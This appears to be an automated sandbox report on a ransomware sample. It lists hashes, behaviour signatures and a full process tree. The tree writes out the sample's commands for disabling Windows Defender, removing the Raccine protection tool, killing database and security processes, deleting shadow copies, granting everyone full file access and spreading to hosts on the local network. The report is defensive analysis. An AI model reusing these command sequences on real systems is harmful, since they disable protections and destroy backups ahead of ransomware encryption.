Analysis
-
max time kernel
19s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
28-05-2021 09:57
General
-
Target
1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
-
Size
367KB
-
MD5
b31f6216e6bc5a6291a0b82de0377553
-
SHA1
0afdc5359268f7e78a0ca3c3c67752edd304a742
-
SHA256
1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb
-
SHA512
7044cae1da196e1997fd21cbac41ff0d8e7dd5da6ebcf14e4ecd26ff53f65936430c009e473c17a2eecabbc5645e2d1fb32c5ef8ab036d045b5941a52e2982f6
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs
-
Modifies file permissions 1 TTPs 64 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 64 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Runs ping.exe 1 TTPs 6 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 38 IoCs
-
Suspicious use of WriteProcessMemory 30 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto2⤵
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sql.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqld.exe /f2⤵
- Kills process with taskkill
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysql.exe /f2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /f2⤵
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM vmwp.exe /f2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpCBA2.bat2⤵
-
C:\Windows\system32\mountvol.exemountvol3⤵
-
-
C:\Windows\system32\find.exefind "}\"3⤵
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\3⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\3⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\3⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- Runs ping.exe
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000001 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_0 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe"C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.33 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe"C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.41 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe"C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.16 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe"C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.14 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe"C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.18 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe"C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.15 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe"C:\Users\Admin\AppData\Local\Temp\5wzwhgdn.exe" \\10.10.0.27 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Oracle\Java\installcache_x64\baseimagefam8 /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070122-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070349-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070541-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q2⤵
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Live\WLive48x48.png /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-04102021-065958.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-04102021-065958.log /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-04102021-065958-00000003-ffffffff.bin /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
-
-
C:\Windows\PAExec-4532-RJMQBVDN.exeC:\Windows\PAExec-4532-RJMQBVDN.exe -service1⤵
-
C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 63⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 03⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 63⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 63⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 23⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F3⤵
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F3⤵
- Modifies registry key
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled3⤵
-
-
